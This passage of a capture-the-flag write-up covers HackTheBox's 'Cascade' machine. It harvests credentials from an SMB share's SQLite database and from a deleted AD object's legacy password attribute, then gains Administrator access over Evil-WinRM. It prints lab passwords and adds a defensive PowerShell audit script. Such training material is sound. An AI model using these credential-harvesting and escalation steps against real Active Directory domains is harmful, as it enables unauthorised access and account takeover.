CASCADE\Audit Share                        Alias            S-1-5-21-3332504370-1206983947-1165150453-1137 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\IT                                 Alias            S-1-5-21-3332504370-1206983947-1165150453-1113 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\Remote Management Users            Alias            S-1-5-21-3332504370-1206983947-1165150453-1126 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
```
We notice that this user belongs to the Audit Share group, so we go back to SMB to see what we can find inside the Audit$ share we saw earlier, for which r.thompson did not have sufficient permissions.
```text
$ smbclient -U "s.smith" \\\\10.10.10.182\\Audit$
Enter WORKGROUP\s.smith's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jan 29 19:01:26 2020
  ..                                  D        0  Wed Jan 29 19:01:26 2020
  CascAudit.exe                       A    13312  Tue Jan 28 22:46:51 2020
  CascCrypto.dll                      A    12288  Wed Jan 29 19:00:20 2020
  DB                                  D        0  Tue Jan 28 22:40:59 2020
  RunAudit.bat                        A       45  Wed Jan 29 00:29:47 2020
  System.Data.SQLite.dll              A   363520  Sun Oct 27 07:38:36 2019
  System.Data.SQLite.EF6.dll          A   186880  Sun Oct 27 07:38:38 2019
  x64                                 D        0  Sun Jan 26 23:25:27 2020
  x86                                 D        0  Sun Jan 26 23:25:27 2020

		13106687 blocks of size 4096. 7783000 blocks available
smb: \> recurse on
smb: \> ls
  .                                   D        0  Wed Jan 29 19:01:26 2020
  ..                                  D        0  Wed Jan 29 19:01:26 2020
  CascAudit.exe                       A    13312  Tue Jan 28 22:46:51 2020
  CascCrypto.dll                      A    12288  Wed Jan 29 19:00:20 2020
  DB                                  D        0  Tue Jan 28 22:40:59 2020
  RunAudit.bat                        A       45  Wed Jan 29 00:29:47 2020
  System.Data.SQLite.dll              A   363520  Sun Oct 27 07:38:36 2019
  System.Data.SQLite.EF6.dll          A   186880  Sun Oct 27 07:38:38 2019
  x64                                 D        0  Sun Jan 26 23:25:27 2020
  x86                                 D        0  Sun Jan 26 23:25:27 2020

\DB
  .                                   D        0  Tue Jan 28 22:40:59 2020
  ..                                  D        0  Tue Jan 28 22:40:59 2020
  Audit.db                            A    24576  Tue Jan 28 22:39:24 2020

\x64
  .                                   D        0  Sun Jan 26 23:25:27 2020
  ..                                  D        0  Sun Jan 26 23:25:27 2020
  SQLite.Interop.dll                  A  1639936  Sun Oct 27 07:39:20 2019

\x86
  .                                   D        0  Sun Jan 26 23:25:27 2020
  ..                                  D        0  Sun Jan 26 23:25:27 2020
  SQLite.Interop.dll                  A  1246720  Sun Oct 27 07:34:20 2019

		13106687 blocks of size 4096. 7783000 blocks available
smb: \> cd DB
smb: \DB\> get Audit.db
getting file \DB\Audit.db of size 24576 as Audit.db (79,7 KiloBytes/sec) (average 79,7 KiloBytes/sec)
smb: \DB\>
```
Looking closely at its contents, we find a file called Audit.db, which we download and open. It is a database, but cat doesn't tell us much about it, so first of all let's see what type of file it is:
```text
$ file Audit.db
Audit.db: SQLite 3.x database, last written using SQLite version 3027002
```
It is an SQLite3 file, so we open it locally to inspect the database and look for relevant information in it:
```text
$ sqlite3
SQLite version 3.31.1 2020-01-27 19:55:54
Enter ".help" for usage hints.
Connected to a transient in-memory database.
Use ".open FILENAME" to reopen on a persistent database.
sqlite> .open Audit.db
sqlite> .tables
DeletedUserAudit  Ldap              Misc
sqlite> SELECT * FROM DeletedUserAudit;
6|test|Test DEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d|CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
7|deleted|deleted guy DEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef|CN=deleted guy\0ADEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef,CN=Deleted Objects,DC=cascade,DC=local
9|TempAdmin|TempAdmin DEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a|CN=TempAdmin\0ADEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a,CN=Deleted Objects,DC=cascade,DC=local
sqlite> SELECT * FROM Ldap;
1|ArkSvc|BQO5l5Kj9MdErXx6Q6AGOw==|cascade.local
sqlite> SELECT * FROM Misc;
sqlite>
```
We inspect the tables in the database and obtain the base64-encoded password of the ArkSvc user:
```
1|ArkSvc|BQO5l5Kj9MdErXx6Q6AGOw==|cascade.local
```
We decode the base64, but it seems something did not work or, perhaps, it is not the cipher we think it is:
```
$ echo "BQO5l5Kj9MdErXx6Q6AGOw=="|base64 -d
������D�|zC�;root@
```
In this case I went around in circles for a while and in the end I decided to google the hash as-is, and I found a website with some C# code and, with it, the decrypted password:
And so we have the credentials of yet another user, climbing a little further towards our goal of reaching admin:
```
arksvc:w3lc0meFr31nd
```
We then log in to the machine with the latest user we have found:
```
$ ruby evil-winrm.rb -i 10.10.10.182 -u "arksvc" -p 'w3lc0meFr31nd'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\arksvc\Documents> whoami
cascade\arksvc
*Evil-WinRM* PS C:\Users\arksvc\Documents>
```
And as on the previous occasion, we review this user's permissions and groups:
```
*Evil-WinRM* PS C:\> whoami /all

USER INFORMATION
----------------

User Name      SID
============== ==============================================
cascade\arksvc S-1-5-21-3332504370-1206983947-1165150453-1106


GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                            Attributes
=========================================== ================ ============================================== ===============================================================
Everyone                                    Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
CASCADE\Data Share                          Alias            S-1-5-21-3332504370-1206983947-1165150453-1138 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\IT                                  Alias            S-1-5-21-3332504370-1206983947-1165150453-1113 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\AD Recycle Bin                      Alias            S-1-5-21-3332504370-1206983947-1165150453-1119 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\Remote Management Users             Alias            S-1-5-21-3332504370-1206983947-1165150453-1126 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\>
```
In this case the user belongs to the AD Recycle Bin group, which the previous user did not, and we remember what we saw at the beginning about the TempAdmin user, who had been deleted and had the same password as root, so perhaps we need to look in the AD recycle bin to recover that account's credentials.
We search google for information on this and find several interesting posts about how to access the objects in the AD recycle bin.
First of all we verify that the recycle bin is enabled:
```
*Evil-WinRM* PS C:\> Get-ADOptionalFeature -Filter *


DistinguishedName  : CN=Recycle Bin Feature,CN=Optional Features,CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=cascade,DC=local
EnabledScopes      : {CN=Partitions,CN=Configuration,DC=cascade,DC=local, CN=NTDS Settings,CN=CASC-DC1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=cascade,DC=local}
FeatureGUID        : 766ddcd8-acd0-445e-f3b9-a7f9b6744f2a
FeatureScope       : {ForestOrConfigurationSet}
IsDisableable      : False
Name               : Recycle Bin Feature
ObjectClass        : msDS-OptionalFeature
ObjectGUID         : 8a5762df-63bc-4407-8249-d1e38e0d322b
RequiredDomainMode :
RequiredForestMode : Windows2008R2Forest
```
And following Microsoft's documentation for Get-ADObject, we look for the deleted objects that are still held in it:
```
*Evil-WinRM* PS C:\> Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects


Deleted           : True
DistinguishedName : CN=CASC-WS1\0ADEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe,CN=Deleted Objects,DC=cascade,DC=local
Name              : CASC-WS1 DEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe
ObjectClass       : computer
ObjectGUID        : 6d97daa4-2e82-4946-a11e-f91fa18bfabe

Deleted           : True
DistinguishedName : CN=Scheduled Tasks\0ADEL:13375728-5ddb-4137-b8b8-b9041d1d3fd2,CN=Deleted Objects,DC=cascade,DC=local
Name              : Scheduled Tasks DEL:13375728-5ddb-4137-b8b8-b9041d1d3fd2
ObjectClass       : group
ObjectGUID        : 13375728-5ddb-4137-b8b8-b9041d1d3fd2

Deleted           : True
DistinguishedName : CN={A403B701-A528-4685-A816-FDEE32BDDCBA}\0ADEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e,CN=Deleted Objects,DC=cascade,DC=local
Name              : {A403B701-A528-4685-A816-FDEE32BDDCBA} DEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e
ObjectClass       : groupPolicyContainer
ObjectGUID        : ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e

Deleted           : True
DistinguishedName : CN=Machine\0ADEL:93c23674-e411-400b-bb9f-c0340bda5a34,CN=Deleted Objects,DC=cascade,DC=local
Name              : Machine DEL:93c23674-e411-400b-bb9f-c0340bda5a34
ObjectClass       : container
ObjectGUID        : 93c23674-e411-400b-bb9f-c0340bda5a34

Deleted           : True
DistinguishedName : CN=User\0ADEL:746385f2-e3a0-4252-b83a-5a206da0ed88,CN=Deleted Objects,DC=cascade,DC=local
Name              : User DEL:746385f2-e3a0-4252-b83a-5a206da0ed88
ObjectClass       : container
ObjectGUID        : 746385f2-e3a0-4252-b83a-5a206da0ed88

Deleted           : True
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
Name              : TempAdmin DEL:f0cc344d-31e0-4866-bceb-a842791ca059
ObjectClass       : user
ObjectGUID        : f0cc344d-31e0-4866-bceb-a842791ca059
```
We find an object that is most likely the one we need, named "TempAdmin", the user name we saw in a file on the SMB share during enumeration, so we try to restore it, but it turns out we do not have permission to do so:
```
*Evil-WinRM* PS C:\> Restore-ADObject -Identity 'f0cc344d-31e0-4866-bceb-a842791ca059'
Insufficient access rights to perform the operation
At line:1 char:1
+ Restore-ADObject -Identity 'f0cc344d-31e0-4866-bceb-a842791ca059'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (CN=TempAdmin\0A...ascade,DC=local:ADObject) [Restore-ADObject], ADException
    + FullyQualifiedErrorId : 0,Microsoft.ActiveDirectory.Management.Commands.RestoreADObject
*Evil-WinRM* PS C:\>
```
Well, that option was apparently too obvious, so we keep looking and review the object's properties, and...
```
*Evil-WinRM* PS C:\> Get-ADObject -Filter {displayName -eq "TempAdmin"} -IncludeDeletedObjects -Properties *


accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : cascade.local/Deleted Objects/TempAdmin DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz
CN                              : TempAdmin DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage                        : 0
countryCode                     : 0
Created                         : 1/27/2020 3:23:08 AM
createTimeStamp                 : 1/27/2020 3:23:08 AM
Deleted                         : True
Description                     :
DisplayName                     : TempAdmin
DistinguishedName               : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData           : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName                       : TempAdmin
instanceType                    : 4
isDeleted                       : True
LastKnownParent                 : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff                      : 0
lastLogon                       : 0
logonCount                      : 0
Modified                        : 1/27/2020 3:24:34 AM
modifyTimeStamp                 : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN               : TempAdmin
Name                            : TempAdmin DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  :
ObjectClass                     : user
ObjectGUID                      : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid                       : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID                  : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet                      : 132245689883479503
sAMAccountName                  : TempAdmin
sDRightsEffective               : 0
userAccountControl              : 66048
userPrincipalName               : TempAdmin@cascade.local
uSNChanged                      : 237705
uSNCreated                      : 237695
whenChanged                     : 1/27/2020 3:24:34 AM
whenCreated                     : 1/27/2020 3:23:08 AM
```
Now we do see a field containing a credential that appears to be base64-encoded:
```
cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz
```
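The root cause here is that the Recycle Bin feature keeps every attribute of a deleted object, custom password attributes included, readable to whoever can read CN=Deleted Objects. As an added defensive check that is not part of the original writeup, the following PowerShell script runs the same Get-ADObject -IncludeDeletedObjects query to report deleted objects that still carry credential-like attributes such as cascadeLegacyPwd; the attribute-name pattern and the exclusion list are assumptions to adapt to your schema.

```powershell
# Added audit script, not part of the original writeup: reports deleted objects
# still held in the AD Recycle Bin whose attributes look like stored credentials
# (e.g. the cascadeLegacyPwd attribute seen above). Requires the ActiveDirectory
# module and read access to CN=Deleted Objects.
# The name pattern and the exclusion list are assumptions; adjust them to your schema.
$credPattern  = 'pwd|passw|secret|cred'
$builtinNoise = @('pwdLastSet', 'badPwdCount', 'badPasswordTime',
                  'msDS-UserPasswordExpiryTimeComputed')

# Without the optional feature, tombstones keep only a handful of attributes
# and there is nothing of this kind to audit.
$feature = Get-ADOptionalFeature -Filter 'Name -eq "Recycle Bin Feature"'
if (-not $feature.EnabledScopes) {
    Write-Output 'Recycle Bin Feature is not enabled in this forest.'
    return
}

# Same query the writeup uses to list the Recycle Bin, with all attributes.
$deleted = Get-ADObject -Filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' `
                        -IncludeDeletedObjects -Properties *

$findings = foreach ($obj in $deleted) {
    # PropertyNames enumerates every attribute returned for this object,
    # including non-standard ones added by schema extensions.
    $suspect = $obj.PropertyNames | Where-Object {
        $_ -match $credPattern -and ($builtinNoise -notcontains $_)
    }
    foreach ($attr in $suspect) {
        # Only report attributes that actually hold a value; the value itself
        # is deliberately not printed.
        if (-not [string]::IsNullOrEmpty("$($obj.$attr)")) {
            [pscustomobject]@{
                Name            = $obj.Name
                ObjectClass     = $obj.ObjectClass
                Attribute       = $attr
                LastKnownParent = $obj.LastKnownParent
                WhenChanged     = $obj.whenChanged
            }
        }
    }
}

if ($findings) {
    $findings | Format-Table -AutoSize
} else {
    Write-Output 'No deleted objects with credential-like attributes found.'
}
```

Anything reported stays readable to members of groups like the AD Recycle Bin group above until the deleted-object lifetime (msDS-DeletedObjectLifetime) expires, so such attributes should be cleared before an account is deleted, or the tombstone purged right after.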
Getting the root flag
We decode the password obtained above and try to log in to the machine as the Administrator user:
```
$ ruby evil-winrm.rb -i 10.10.10.182 -u Administrator
Enter Password:

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cascade\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> dir


    Directory: C:\Users\Administrator\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        5/15/2020   2:56 PM             34 root.txt
-a----        3/25/2020  11:17 AM           1031 WinDirStat.lnk


*Evil-WinRM* PS C:\Users\Administrator\desktop>
```
And with that we have our root flag, completing this machine and earning our points.
If you are a HackTheBox user and liked my writeup, please give me respect at the following link: https://www.hackthebox.eu/home/users/profile/103792